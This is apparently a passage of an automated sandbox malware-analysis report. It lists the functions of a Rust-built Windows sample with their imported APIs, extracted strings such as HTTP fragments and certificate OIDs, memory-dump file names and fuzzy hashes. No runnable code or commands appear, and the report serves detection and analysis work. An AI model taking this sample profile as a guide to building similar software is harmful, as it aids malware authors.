CertDuplicateCertificateChain.CRYPT32 ref: 00007FF6B194B9A0
CertFreeCertificateChain.CRYPT32 ref: 00007FF6B194B9AA
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194B9DA
CertDuplicateCertificateContext.CRYPT32 ref: 00007FF6B194BA10
CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6B194BA1C
CertDuplicateCertificateContext.CRYPT32 ref: 00007FF6B194BA36
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194BA59
CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6B194BA6B
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194BA7E
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194BA90
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194BA95
CertFreeCertificateChain.CRYPT32 ref: 00007FF6B194BAAE
CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF6B194BB2C
CertFreeCertificateChain.CRYPT32 ref: 00007FF6B194BBC5
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194BBCE
AcceptSecurityContext.SECUR32 ref: 00007FF6B194BF0E
FreeContextBuffer.SECUR32 ref: 00007FF6B194BFE1
GetLastError.KERNEL32 ref: 00007FF6B194C51F
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194C53A
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194C53F
CertCloseStore.CRYPT32 ref: 00007FF6B194C546
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194C592
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194C6E4

Strings

unexpected EOF during handshakeassertion failed: size >= nread, xrefs: 00007FF6B194C502
1.3.6.1.4.1.311.10.3.3, xrefs: 00007FF6B194B87C
assertion failed: !self.context.is_null(), xrefs: 00007FF6B194C5B5
1.3.6.1.5.5.7.3.1, xrefs: 00007FF6B194B86E
2.16.840.1.113730.4.1, xrefs: 00007FF6B194B88A

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Cert$Certificate$Context$Free$ChainStore$Duplicate$CertificatesEnum$Close$AcceptAttributesBufferErrorLastPolicyQuerySecurityVerify
String ID: 1.3.6.1.4.1.311.10.3.3$1.3.6.1.5.5.7.3.1$2.16.840.1.113730.4.1$assertion failed: !self.context.is_null()$unexpected EOF during handshakeassertion failed: size >= nread
API String ID: 4140747990-1886201627
Opcode ID: d9a0d31b517766783ca8806981e6609f97526230683b9afba497e579545742a9
Instruction ID: c3d3e8c001ec216502a4268edf18dbeb6f6ca10845e4fe6c4e0386c3a2d9f313
Opcode Fuzzy Hash: d9a0d31b517766783ca8806981e6609f97526230683b9afba497e579545742a9
Instruction Fuzzy Hash: 66A24C76A08BC2AAEB649F29D9443E927A1FB44B8CF044436CF6D87B95DF38E155C340

Function 00007FF6B19418F2 Relevance: 63.0, APIs: 17, Strings: 18, Instructions: 1715COMMON

Download Yara Rule

Strings

HTTP/1.0, xrefs: 00007FF6B1945A03
no host , xrefs: 00007FF6B19433BB
nnel, xrefs: 00007FF6B1945BAD
t in url, xrefs: 00007FF6B1945F67
no host , xrefs: 00007FF6B19455A1
zation: , xrefs: 00007FF6B1943E19
User-Age, xrefs: 00007FF6B1943C5D
HTTP/1.0, xrefs: 00007FF6B1944E48
t in url, xrefs: 00007FF6B19433AD
HTTP/1.1, xrefs: 00007FF6B19459DC
, xrefs: 00007FF6B1943B27
t in url, xrefs: 00007FF6B1945593
, xrefs: 00007FF6B1943AC1
HTTP/1.1, xrefs: 00007FF6B1944E21
, xrefs: 00007FF6B1943A8E
nt: , xrefs: 00007FF6B1943C6B
no host , xrefs: 00007FF6B1945F75
, xrefs: 00007FF6B1943AF4

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: $ $ $ $HTTP/1.0$HTTP/1.0$HTTP/1.1$HTTP/1.1$User-Age$nnel$no host $no host $no host $nt: $t in url$t in url$t in url$zation:
API String ID: 0-1690944572
Opcode ID: 7bee5eb6d9a0bf74cbf821b68ba39bf2ae69bf7ac010322e87b30aa6359f4835
Instruction ID: d90fd9776a05d1b1925f8ff955d1a7f367d0705c96de0ef7ad4bba21b557f5bc
Opcode Fuzzy Hash: 7bee5eb6d9a0bf74cbf821b68ba39bf2ae69bf7ac010322e87b30aa6359f4835
Instruction Fuzzy Hash: B5239E22909BC699F7719F28D9487E937A8FB4578CF458136DB8C4B796DF38A684C300

Function 00007FF6B18ED140 Relevance: 33.0, APIs: 15, Strings: 5, Instructions: 2975memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B18F03E1
HeapFree.KERNEL32 ref: 00007FF6B18F03FE

Strings

keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: , xrefs: 00007FF6B18EDECD
close, xrefs: 00007FF6B18EDE9B
size overflows MAX_SIZE, xrefs: 00007FF6B18F09E0, 00007FF6B18F0B2C, 00007FF6B18F0B71
HTTP/1.0, xrefs: 00007FF6B18ED49F
HTTP/1.1, xrefs: 00007FF6B18ED4B2

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID: HTTP/1.0$HTTP/1.1$close$keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: $size overflows MAX_SIZE
API String ID: 3298025750-2511419304
Opcode ID: dc687dc90c14d5f4513b3b02b28eb8197c1ff57ca4b0174335e7197a768d60b4
Instruction ID: d4a4be000d0b8080c7444752b5b437aa4bd19feae3c5b5d344823a76c4669f47
Opcode Fuzzy Hash: dc687dc90c14d5f4513b3b02b28eb8197c1ff57ca4b0174335e7197a768d60b4
Instruction Fuzzy Hash: 28739126909BC599E7319F29D8483E837E1FB5478CF049226DB4D9BB99DF39A385C300

Function 00007FF6B1907278 Relevance: 25.6, APIs: 8, Strings: 8, Instructions: 1649COMMON

Download Yara Rule

Strings

assertion failed: end <= len, xrefs: 00007FF6B1909573
<, xrefs: 00007FF6B1909163
capacity overflow, xrefs: 00007FF6B1909614
XN--, xrefs: 00007FF6B19076B4
<, xrefs: 00007FF6B1909506
=E, xrefs: 00007FF6B1907A9E
internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 00007FF6B19095E7
assertion failed: index < len, xrefs: 00007FF6B19095BC

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: <$<$XN--$assertion failed: end <= len$assertion failed: index < len$capacity overflow$internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$=E
API String ID: 0-1779829707
Opcode ID: bdc0325339d6e8654f488914bd3d086c943e8f8194a12d5bb67afe0576502ca5
Instruction ID: 31da5a2dd45c9e81a3c8f3c705a83493769b124cc9674a81c94c2cecfcbd5289
Opcode Fuzzy Hash: bdc0325339d6e8654f488914bd3d086c943e8f8194a12d5bb67afe0576502ca5
Instruction Fuzzy Hash: A3036F62A04AC699EB74DF29C8483E93361FB44B9CF504536CB4D9BB99DF39E685C300

Function 00007FF6B18C5210 Relevance: 24.1, APIs: 19, Instructions: 350memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C52E8
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C5329
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C545B
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C5481
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C5501
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C5573
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C55BA

Part of subcall function 00007FF6B1957890: HeapFree.KERNEL32 ref: 00007FF6B19578F4
Part of subcall function 00007FF6B1957890: HeapFree.KERNEL32 ref: 00007FF6B1957911

HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C55FB
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C562F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C563C

Part of subcall function 00007FF6B18C5EA0: HeapFree.KERNEL32 ref: 00007FF6B18C5F34

HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C567F
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C56ED
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C570B
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C574D
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C576B
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18C51C8), ref: 00007FF6B18C578B

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: c39903f28ba21ab6074574fc8eeda294104425a5f2ab422eecd8b1fdbcf4714e
Instruction ID: 7fe47489dbd87706d62c6930333dc2c663c40aee7e932420a44974710cb4215a
Opcode Fuzzy Hash: c39903f28ba21ab6074574fc8eeda294104425a5f2ab422eecd8b1fdbcf4714e
Instruction Fuzzy Hash: 19020976B08A8695FB558B6AD8883FD27A1FB85B9CF544532CF1D973A4CF38E4818340

Function 00007FF6B19157D0 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF6B1915939
GetFinalPathNameByHandleW.KERNEL32 ref: 00007FF6B191594F
GetLastError.KERNEL32 ref: 00007FF6B191595B
GetLastError.KERNEL32 ref: 00007FF6B1915975
HeapFree.KERNEL32 ref: 00007FF6B19159F6
GetLastError.KERNEL32 ref: 00007FF6B1915A61
HeapFree.KERNEL32 ref: 00007FF6B1915A87
HeapFree.KERNEL32 ref: 00007FF6B1915AF6
HeapFree.KERNEL32 ref: 00007FF6B1915B0C
HeapFree.KERNEL32(?,?,00000000,00000000,?), ref: 00007FF6B1915BF6

Strings

Filepathfatal runtime error: I/O error: operation failed to complete synchronously, xrefs: 00007FF6B1915804
handlepanicked at :std\src\path.rs, xrefs: 00007FF6B1915842
internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 00007FF6B1915B81

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$ErrorLast$FinalHandleNamePath
String ID: Filepathfatal runtime error: I/O error: operation failed to complete synchronously$handlepanicked at :std\src\path.rs$internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
API String ID: 867485974-3155545919
Opcode ID: 3d0fe08a0a7dedc026ce79c1907a00d5e0fadfc7482080ae489c893787ab75f9
Instruction ID: efe2aa909ee21522b1110226235dc5c14b4f4a233ea9198123b069396cc13077
Opcode Fuzzy Hash: 3d0fe08a0a7dedc026ce79c1907a00d5e0fadfc7482080ae489c893787ab75f9
Instruction Fuzzy Hash: 6BB18C62A04BD6A9F7219F2AE8443E923A4FB46B9CF414136CF5D97795DF38E285C300

Function 00007FF6B19253F9 Relevance: 16.5, APIs: 5, Strings: 4, Instructions: 708memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B1928630

Strings

setybdet, xrefs: 00007FF6B19254DA
uespemos, xrefs: 00007FF6B19254B0
modnarod, xrefs: 00007FF6B19254C0
arenegyl, xrefs: 00007FF6B19254CD

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID: arenegyl$modnarod$setybdet$uespemos
API String ID: 3298025750-66988881
Opcode ID: be182310075d182c4c38d3d5d3e8202872813077517d929ae25a3ba9aa76461c
Instruction ID: 4d1f5c2a59f1a927830b5d060eeac55fa1f10264b837e9b522d9ffa5d7075f77
Opcode Fuzzy Hash: be182310075d182c4c38d3d5d3e8202872813077517d929ae25a3ba9aa76461c
Instruction Fuzzy Hash: 2172DC62A18BC681EB419F29D4407E937A0FB99B8CF499232DF8D97356EF38D581C350

Function 00007FF6B191D320 Relevance: 14.9, APIs: 6, Strings: 2, Instructions: 854COMMON

Download Yara Rule

Strings

assertion failed: slot.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\oneshot.rs, xrefs: 00007FF6B191E25B
value already sent, xrefs: 00007FF6B191E23A

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: assertion failed: slot.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\oneshot.rs$value already sent
API String ID: 0-2929431767
Opcode ID: 5a4aaa5e4d483b8b3243eb7bb965130e7894fca3b29374484255bb582dfbea2d
Instruction ID: 9a61e345f998d32a1eeba9ad484a2cb0225d3ecec5b9be74f70d9ea8f6dc4dd2
Opcode Fuzzy Hash: 5a4aaa5e4d483b8b3243eb7bb965130e7894fca3b29374484255bb582dfbea2d
Instruction Fuzzy Hash: 4FA27E32908BD699E7729F29C8443ED37A4FB59B8CF044226DB8C9BB56DF349295C340

Function 00007FF6B19BB670 Relevance: 13.8, APIs: 9, Instructions: 263memorythreadCOMMON

Download Yara Rule

APIs

InitializeProcThreadAttributeList.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000400,00007FF6B19B6683), ref: 00007FF6B19BB6CE
HeapReAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000400,00007FF6B19B6683), ref: 00007FF6B19BB73A
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6B19BBA6B

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Heap$AllocAttributeFreeInitializeListProcThread
String ID:
API String ID: 512342461-0
Opcode ID: 963ec319a7a4dca655220615ae3dcd113748ccfec7e8d86e451ceeba80e73821
Instruction ID: c725d919d9b11cc8922b219f260846d8c17009ac2031cc911e1331b40e62df6f
Opcode Fuzzy Hash: 963ec319a7a4dca655220615ae3dcd113748ccfec7e8d86e451ceeba80e73821
Instruction Fuzzy Hash: 9BA1C766B19A96E5EB149B2E95543BB27A0FF49BACF544231DF2E837D1DE3CE0418300

Function 00007FF6B1909890 Relevance: 9.8, APIs: 4, Strings: 2, Instructions: 796memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B190A68D
HeapFree.KERNEL32 ref: 00007FF6B190A6B1
HeapFree.KERNEL32 ref: 00007FF6B190A6D9
HeapFree.KERNEL32 ref: 00007FF6B190A707

Strings

assertion failed: end <= len, xrefs: 00007FF6B190A7AA
assertion failed: index < len, xrefs: 00007FF6B190A7D3

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID: assertion failed: end <= len$assertion failed: index < len
API String ID: 3298025750-3565831939
Opcode ID: a892e3442623268be9447522e7e201fade9871220e3f7d5e31c6f3d5752b85d0
Instruction ID: e7c2e4b12e5c109b36e2e51ac2cd40eb14cc249238db1bdf70726a9a3b680693
Opcode Fuzzy Hash: a892e3442623268be9447522e7e201fade9871220e3f7d5e31c6f3d5752b85d0
Instruction Fuzzy Hash: C9826B32A08AC699EB74DF29D8483ED33A5FB4478CF504136DB4D8BA99DF789685C340

Function 00007FF6B191F1E0 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 553COMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B191F312

Strings

Out of bounds access, xrefs: 00007FF6B191F936, 00007FF6B191F950

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: AddressSingleWake
String ID: Out of bounds access
API String ID: 3114109732-3656037976
Opcode ID: cd9e2d4daa649e92a74d60ee140ba3ca0f98a7dd10ca3480420237587370f393
Instruction ID: 10b75e4b924addc0a690057bcf61b2cbcfb4a8a09dca567e837c6dd4e008bac0
Opcode Fuzzy Hash: cd9e2d4daa649e92a74d60ee140ba3ca0f98a7dd10ca3480420237587370f393
Instruction Fuzzy Hash: AF32B422A08BE6A5EB51DF2994403AD7764FB4478CF404532DF8E97796DF38E8A9C340

Function 00007FF6B19F11BC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6B19F11E8
GetCurrentThreadId.KERNEL32 ref: 00007FF6B19F11F6
GetCurrentProcessId.KERNEL32 ref: 00007FF6B19F1202
QueryPerformanceCounter.KERNEL32 ref: 00007FF6B19F1212

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: f54ea32c7e25ebe595444edeb18cfbc5345f15f5832b39905aa02e7db610c66f
Instruction ID: 674103332bd211ea794178fafed1632823ea245149b7e9a6612796a9745a51d2
Opcode Fuzzy Hash: f54ea32c7e25ebe595444edeb18cfbc5345f15f5832b39905aa02e7db610c66f
Instruction Fuzzy Hash: 7A111F26B14B019AEB009B64E8582B833A4F759B58F441A36DB6D867A4DF78E154C340

Function 00007FF6B19EF490 Relevance: 2.2, Strings: 1, Instructions: 974COMMON

Download Yara Rule

Strings

[]:, xrefs: 00007FF6B19EFCB0

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: []:
API String ID: 0-1454498536
Opcode ID: 7feab95ea93e1cbd139358d22b9f2f3b8f6393f923a3c78766ad7bd745bf72c0
Instruction ID: cab03c0f3776e6f3114652ad896fc06b63091b8475f2fb1b478ca66edba40996
Opcode Fuzzy Hash: 7feab95ea93e1cbd139358d22b9f2f3b8f6393f923a3c78766ad7bd745bf72c0
Instruction Fuzzy Hash: 3A823823A2879362EB219B18E400379A350FB557ACF544332EF9D936D6DF7EE6458700

Function 00007FF6B1A01800 Relevance: 1.7, APIs: 1, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f6c8384743c92b0a4e82f4b58f9c63253ded16eed555c36d5699057c90d85db
Instruction ID: 19e73c88a8ec1a2fcf35c9ec014b3868010d84bc4f4278f8cfe05061ac2c4e9c
Opcode Fuzzy Hash: 7f6c8384743c92b0a4e82f4b58f9c63253ded16eed555c36d5699057c90d85db
Instruction Fuzzy Hash: 83020E63A08BD595EB118B2D94457B97FA0EB56BA8F048726CFAE537C1DF38D186C300

Function 00007FF6B1A07280 Relevance: 1.7, APIs: 1, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 960bbe5fd1e3f72d0cd33a0272390d3f6aa53e08d62734e2cb1a76d02c9eabd0
Instruction ID: e77c6dc41e97aa302c626f6f9bd599d783a823c57821c57e011a237fd3c8cb3a
Opcode Fuzzy Hash: 960bbe5fd1e3f72d0cd33a0272390d3f6aa53e08d62734e2cb1a76d02c9eabd0
Instruction Fuzzy Hash: 5FF12462A18BC592EB058F6D94095B96B60FB85BE8F048736DFAE527D1EF3CE144C300

